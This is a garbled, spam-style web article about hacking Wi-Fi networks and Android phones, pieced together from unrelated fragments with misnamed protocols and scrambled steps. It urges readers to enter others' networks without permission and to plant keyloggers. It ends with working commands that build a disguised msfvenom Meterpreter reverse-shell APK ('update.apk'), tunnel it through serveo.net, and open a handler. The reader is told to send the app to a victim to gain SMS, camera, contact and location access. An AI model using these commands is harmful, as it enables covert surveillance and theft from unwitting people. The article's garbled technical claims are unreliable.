Hack Device With Mac Address

  1. Hack Iphone With Mac Address
  2. Hack Phone With Mac Address
  3. Hack Device With Mac Address

Are you looking for easy ways on how to hack a WiFi network? Perhaps you were downloading your favorite movie or music, but your internet subscription expires before the download is complete. Leaning how to hack Wi-Fi passwords can save you from disappointments of a failed download.

Already in the 1980s it was possible in the WDC-adapter drivers to replace the hardware MAC address with another address. So if I knew your MAC address and I saw that you left the subnet, I could pretend to be you (your computer), run a torrent server, send spam mails, threat mails, start hacking attempts, you name it. MAC Address is simply known as media access control address. MAC address of a device is a unique identifier that is assigned to network interfaces for communications at the data link layer of a network segment. These MAC addresses are used as a network address for most IEEE 802 network technologies, for example, Ethernet and Wi-Fi. MAC spoofing is a technique for changing a factory-assigned Media Access Control (MAC) address of a network interface on a networked device. The MAC address that is hard-coded on a network interface controller (NIC) cannot be changed. However, many drivers allow the MAC address to be changed.

Knowing how to hack a WiFi network can also help you to retrieve your forgotten or changed Wi-Fi password.

You can also use the skill to access someone else’s wireless network without asking for their permission.
There’re many Wi-Fi networks around us. Whether its an office, school, neighbor, or your college Wi-Fi network, you can hack the passwords without much hustle.

What You Need to Hack a WiFi Network

To hack a Wi-Fi password, you need a hacking software such as Kali Linux operating system.

You can also use Aircrack-ng program which is an easy-to-use tool.

Additionally, there’re other tools such as Hoverwatch phone tracker and keylogger that you can use to hack passwords of wireless networks.

This tool records every key typed on phones keypads or PC keyboards.

Thus, when you install the software on someone’s else device, the tool will save passwords on private Wi-Fi networks the target phone connects to.

You can also use a Wi-Fi adapter that has the ultimate range to hack a Wi-Fi network

There’re other tools such as Fluxion program which are useful on Linux PC.

Hacking programs are in various types. Whether you’re using an Android, Mac, or Windows device, you can choose the tool compatible with the operating system of your phone.

Types of Wi-Fi Protections

Three methods of encoding are available for Wi-Fi networks: WAP. WEP, and WPA2.
  • WEP doesn’t guarantee maximum safety because its algorithm has been cracked.
  • While WAP network has capabilities of generating temporary keys. This makes these networks vulnerable to hacking.
  • WAP2 is one of the most secure networks. It utilizes AES (Advanced Encryption Standards).

However, every Wi-Fi network can be hacked with the right tools.

Below are the methods on how to hack a Wi-Fi network.

Breaking Wi-Fi with WEP Security

The network is the first to be invented, and it was launched in 1999. The Wi-Fi was cracked the same year.

Many people have been able to hack this network type because the process is simple.

You only need to capture its Initializing Vector. The technical process may be hard to understand, but the hacking tool such as Aircrack-ng will complete the entire process fast.
The process is also first, but it depends on the device. It can last 20-30 minutes for some devices. The hacking program will hack a WEP password regardless of its strength or length.

Aircrack hacker tool is available for Windows and Linux. You can use it to hack any type of password.

For Windows operating system, the process can last up to 4 hours, but it’ll be successful. The program also uses Graphic User Interface (GUI), and thus you don’t need to run commands for the software to work.
If you prefer using Kali Linux, you need a wireless adapter to hack a Wi-Fi network. Install the program and follow its simple commands.

Breaking Wi-Fi with WPA or WPA2 Security

Wi-Fi Protected Access (WPA) is in two forms. WPA and WPA2. This network type is more secure than WEP Wi-Fi because it has a secure algorithm. There’re two ways on how to hack this network.

Wordlist Attack

This’s the most common technique. The method requires you to create a dictionary or wordlist using software such as Crunch.
Once you generate the list, use Aircrack to input the possible passwords you’ve

Fluxion Attack

This’s a more secure hacking technique. If you enter the correct password, you’ll create a connection to the network.
But if you input a wrong password, you’ll not access the Wi-Fi.

Breaking Wi-Fi with Mac Address Filtering

This method can only apply on devices with Mac Address.
And only the compatible devices can connect to the hacked Wi-Fi network.
Every Mac device has its unique address, and only devices with similar addresses can connect to the same network. However, you can hack and connect to these networks by changing the Mac Address of a device temporally.
You can use Kali Linux to identify all devices connected to a particular network.
Then change the Mac Addresses using Mac Changer app.
If you’re using Windows PC, you need to know the addresses of the devices manually. It’s only then you’ll be able to hack a Wi-Fi.

For Android users, you need to know the Mac address of the device.

You also need to root your phone and use Wi-Fi Mac Changer to change the Mac address.

Breaking WIFI with Hidden Network

In this method, once you connect to a particular network, nobody else will be able to access it. Also, no one will detect you’ve connected to the Wi-Fi network because it runs in a hidden mode. You need to enter the network name to enable connections.

Breaking Wi-Fi with Open Network

This hacking technique can be used on public Wi-Fi such as an office or college network.
When you hack through the open network method, you’ll gain full control of the Wi-Fi network. To succeed in this method, you need to hack the Wi-Fi router.
If you manage to change these credentials, you can hack the network using wordlist attack, a keylogger, brute force attack, or, Man in the middle method.

How to Hack a WiFi Network Using an Android or iPhone Device

  1. Rout your device.
  2. Check your device’s Broadcom support. Your device needs to support Broadcom chipsets.
  3. Download Bcmon app. This tool will enable monitoring of Broadcom chipsets on your device.
  4. Once you install the program, run it and click on “Monitor Mode.”
  5. Download Reaver app. This software will help in cracking WPS pin of the Wi-Fi network.
  6. Launch the Reaver application. Click on “Confirm” for confirmation that you aren’t using the tool for illegal purposes.
  7. Verify your settings and check the “Aromatic Advanced Setting” box.
  8. Click on “Start Attack” to hack a Wi-Fi network.


Hack Iphone With Mac Address

Hacking Wi-Fi is simple when you have the right tools. Whether WPS2, WPA, OR WEP security, you can crack passwords of these networks using Aircrack and Kali Linux tools.
And this guide will help you learn how to hack a WiFi network fast.

Full access on victim's device

Following Option, You Can Use Through Termux App to Hack Any Android Device

  • Battery Status
  • SMS Inbox read
  • SMS Send
  • Telephony Device Info
  • Toast
  • TTS Engine in Android
  • TTS Speak
  • Vibrate the Phone
  • Wi-Fi Connection Info
  • Wi-Fi Scan Info
  • Camera Info
  • Camera Photo
  • Clipboard Ge
  • Clipboard Set
  • Contact List
  • Download file with Android Download Manager
  • Location via GPS, Mobile Network or Wi-Fi
  • Notification
  • Open URL
  • Share file with Android actions

Requirements :

  • Android 5.0 and Above
  • Termux android app.
  • Install the Metasploit framework in Termux. I will show you how to install Metasploit in Termux below.
  • Termux should be allowed to external storage. ( for this only enter this command at once ‘‘Termux-setup-storage” )

Step 1: install Metasploit framework in Termux to Hack Any Android Device

✅ first install Termux, links are given above.

✅open the app and wait while it installs some file.

✅ hit the command.

apt update $ apt upgrade

✅ then enter or copy this command

apt install curl


✅ enter or copy this

curl -LO https://raw.githubusercontent.com/Hax4us /Metasploit_termux/master/metasploit.sh

Hack Phone With Mac Address

✅ now give permission by giving this command.

chmod +x metasploit.sh

✅ now execute with this command.


✅ and now wait until processing and downloading.. it can take up to 40 min, depend upon internet speed

✅ now you have successfully installed the Metasploit framework.

  • Step 2: port forwarding

✅ open Termux and type the below command. it will successfully install the open ssh

pkg install openssh

✅ after that type the below command and your session will start.

ssh -R 4564:localhost:4564 serveo.net

✅ Now the session has successfully started.

Step 3: creating Apk file with an embedded payload

✅ firstly type the below command to get a payload app and Hack Any Android Device

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/download/update.apk

✅ wait for a min and you successfully create the payload app.

Now The Main Step Send The Created App to Your victim or Friend And Ask them To install this app.

Step 4: setup Metasploit in Termux

✅ Activate Metasploit framework in Termux by entering this command in the new session


✅ now type this command one by one to Hack Any Android Device

  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST localhost
  4. Now use set LPORT 4564
  5. exploit -j -z

✅ bingo ……you have successfully hack your victim phone.

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Hack Device With Mac Address

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